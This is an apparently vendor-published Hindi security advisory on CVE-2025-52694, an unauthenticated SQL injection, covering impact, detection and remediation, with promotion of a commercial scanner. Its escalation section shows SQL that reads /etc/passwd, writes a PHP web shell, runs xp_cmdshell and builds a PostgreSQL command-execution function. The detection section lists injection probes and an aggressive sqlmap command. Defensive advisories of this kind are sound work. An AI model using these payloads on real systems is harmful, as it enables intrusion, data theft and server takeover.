剣 KENSAI
CVE गंभीर 12 जनवरी 2026 · 10 मिनट पढ़ें

CVE-2025-52694: Unauthenticated SQL Injection Enables Arbitrary Command Execution on Exposed Services

बिना किसी ऑथेंटिकेशन की ज़रूरत वाली एक SQL इंजेक्शन भेद्यता रिमोट हमलावरों को भेद्य इंटरनेट-एक्सपोज़्ड सर्विस पर मनमाने SQL कमांड निष्पादित करने देती है, जो डेटा की गोपनीयता, अखंडता, और उपलब्धता को ख़तरे में डालती है। CVSS 10.0।


CVSS 10.0 — क्रिटिकल
फ़ील्डविवरण
CVE IDCVE-2025-52694
गंभीरताक्रिटिकल (CVSS 3.1: 10.0)
भेद्यता प्रकारSQL इंजेक्शन (CWE-89)
प्रकाशित12 जनवरी 2026
ऑथेंटिकेशन आवश्यककोई नहीं
अटैक वेक्टरनेटवर्क (इंटरनेट-फ़ेसिंग)

CVE-2025-52694 क्या है?

CVE-2025-52694 एक इंटरनेट-एक्सपोज़्ड सर्विस में एक क्रिटिकल SQL इंजेक्शन भेद्यता है जिसे शोषण के लिए किसी ऑथेंटिकेशन की ज़रूरत नहीं है। हमलावर भेद्य सर्विस की डेटाबेस-क्वेरी में सीधे मनमाने SQL कमांड इंजेक्ट कर सकते हैं, जिससे संभावित रूप से सभी डेटाबेस-सामग्री पढ़ी या संशोधित की जा सकती है और — डेटाबेस-कॉन्फ़िगरेशन के आधार पर — अंतर्निहित सर्वर पर रिमोट कोड एक्ज़ीक्यूशन हासिल किया जा सकता है।

SQL इंजेक्शन अपनी शुरुआत से ही OWASP Top 10 में रहा है और मौजूद होने पर विनाशकारी रूप से प्रभावी बना रहता है। पूर्ण डेटा-एक्सेस वाली एक अनऑथेंटिकेटेड, नेटवर्क-सुलभ SQL इंजेक्शन उतनी ही ख़तरनाक है जितनी कोई भेद्यता हो सकती है — इसीलिए अधिकतम CVSS स्कोर है।

तकनीकी प्रभाव

⚠ पूर्ण CIA ट्रायड कॉम्प्रोमाइज़

गोपनीयता: सभी डेटाबेस-सामग्री पढ़ने योग्य — यूज़रनेम, पासवर्ड, PII, API की, वित्तीय डेटा।
अखंडता: डेटा संशोधन, रिकॉर्ड-हटाना, स्कीमा-परिवर्तन संभव।
उपलब्धता: संसाधन-समाप्त करने वाली क्वेरी के ज़रिए DoS हमले; डेटा-विनाश संभव।

SQL इंजेक्शन से RCE तक एस्केलेशन पथ

विस्तारित फ़ंक्शनैलिटी सक्षम वाले डेटाबेस पर, SQL इंजेक्शन ऑपरेटिंग-सिस्टम कमांड एक्ज़ीक्यूशन तक बढ़ सकता है:

-- MySQL with FILE privilege — read OS files
SELECT LOAD_FILE('/etc/passwd');

-- MySQL with INTO OUTFILE — write web shells
SELECT '<?php system($_GET["cmd"]); ?>'
INTO OUTFILE '/var/www/html/shell.php';

-- MSSQL with xp_cmdshell enabled
EXEC xp_cmdshell 'whoami';

-- PostgreSQL large object injection
SELECT lo_import('/etc/passwd');
CREATE OR REPLACE FUNCTION cmd(text) RETURNS text AS $$
  DECLARE result text;
  BEGIN
    EXECUTE 'COPY (SELECT '') TO PROGRAM ''' || $1 || '''';
    RETURN result;
  END;
$$ LANGUAGE plpgsql;

प्रभावित वर्ज़न

विशिष्ट प्रोडक्ट और वर्ज़न जानकारी के लिए वेंडर एडवाइज़री देखें। इंटरनेट-ट्रैफ़िक के सामने उजागर, प्रभावित के रूप में सूचीबद्ध किसी भी वर्ज़न को सक्रिय रूप से शोषण-योग्य माना जाना चाहिए। तुरंत वेंडर-प्रदत्त पैच्ड वर्ज़न में अपडेट करें।

पहचान विधियाँ

मैनुअल SQL इंजेक्शन टेस्टिंग

# Basic error-based detection
# Append ' to parameters and observe error responses
GET /search?q=test' HTTP/1.1

# Boolean-based blind detection
GET /search?q=test' AND 1=1-- -   # Should return normal results
GET /search?q=test' AND 1=2-- -   # Should return empty/different results

# Time-based blind detection (confirm injection)
GET /search?q=test'; WAITFOR DELAY '0:0:5'-- -   # MSSQL
GET /search?q=test'; SELECT SLEEP(5)-- -          # MySQL

# Use SQLMap for automated exploitation confirmation (authorized testing only)
sqlmap -u "https://target.com/page?id=1" --level=5 --risk=3 --dbs

WAF लॉग समीक्षा

SQL कीवर्ड सहित पैटर्न के लिए अपने WAF या एप्लिकेशन लॉग की समीक्षा करें (UNION SELECT, OR 1=1, SLEEP(, xp_cmdshell) रिक्वेस्ट-पैरामीटर में। CVE-2025-52694 के सक्रिय शोषण में ये पैटर्न दिखेंगे।

🔍 KENSAI पहचान: KENSAI का SQL Injection Scanner एरर-आधारित, ब्लाइंड, टाइम-आधारित, और आउट-ऑफ़-बैंड इंजेक्शन तकनीकों को कवर करता है। CVE-2025-52694 इंजेक्शन पैटर्न हमारी पेलोड-लाइब्रेरी में शामिल हैं और पैरामीटर, हेडर, और JSON/XML बॉडी-फ़ील्ड सहित सभी इनपुट-वेक्टर के ख़िलाफ़ मैच किए जाते हैं।

सुधार कदम

  1. तुरंत वेंडर पैच लागू करें: वेंडर एडवाइज़री में निर्दिष्ट पैच्ड वर्ज़न में अपडेट करें।
  2. पैरामीटराइज़्ड क्वेरी: सुनिश्चित करें कि सभी डेटाबेस-क्वेरी पैरामीटराइज़्ड इनपुट के साथ prepared statement का उपयोग करती हैं — SQL इंजेक्शन का यही एकमात्र विश्वसनीय फ़िक्स है।
  3. इनपुट वैलिडेशन: सभी यूज़र-प्रदत्त इनपुट को वैलिडेट और सैनिटाइज़ करें, जहाँ ज़रूरी न हो वहाँ SQL मेटाकैरेक्टर को अस्वीकार करें।
  4. न्यूनतम विशेषाधिकार: डेटाबेस-अकाउंट के पास न्यूनतम आवश्यक परमिशन होनी चाहिए — एप्लिकेशन-अकाउंट से कभी sa या root डेटाबेस-एक्सेस नहीं।
  5. WAF नियम: SQL इंजेक्शन पेलोड का पता लगाने और ब्लॉक करने के लिए WAF नियम डिप्लॉय या अपडेट करें — यह एक क्षतिपूर्ति-नियंत्रण है, फ़िक्स नहीं।
  6. ख़तरनाक stored procedure अक्षम करें: जब तक स्पष्ट रूप से ज़रूरी न हो, xp_cmdshell और अन्य OS-स्तर के डेटाबेस-फ़ंक्शन अक्षम करें।
  7. नेटवर्क विभाजन: डेटाबेस सर्वर कभी भी सीधे इंटरनेट-सुलभ नहीं होने चाहिए।

KENSAI पहचान क्षमता

KENSAI CVE-2025-52694 सहित व्यापक SQL इंजेक्शन पहचान प्रदान करता है:

आपके स्टैक में SQL इंजेक्शन?

KENSAI आपकी पूरी वेब-एप्लिकेशन अटैक-सतह को SQL इंजेक्शन और 200+ अन्य क्रिटिकल भेद्यताओं के लिए स्कैन करता है। किसी SQL इंजेक्शन को भंग न बनने दें।

SQL इंजेक्शन के लिए मुफ़्त स्कैन करें

KENSAI सुरक्षा शोध टीम द्वारा प्रकाशित · अधिक CVE विश्लेषण

संबंधित लेख

रीडायरेक्ट हो रहा है... Ruflo lanceert Claude-native agent-orchestratie met 28K sterren, SuperMemory AI रीडायरेक्ट हो रहा है...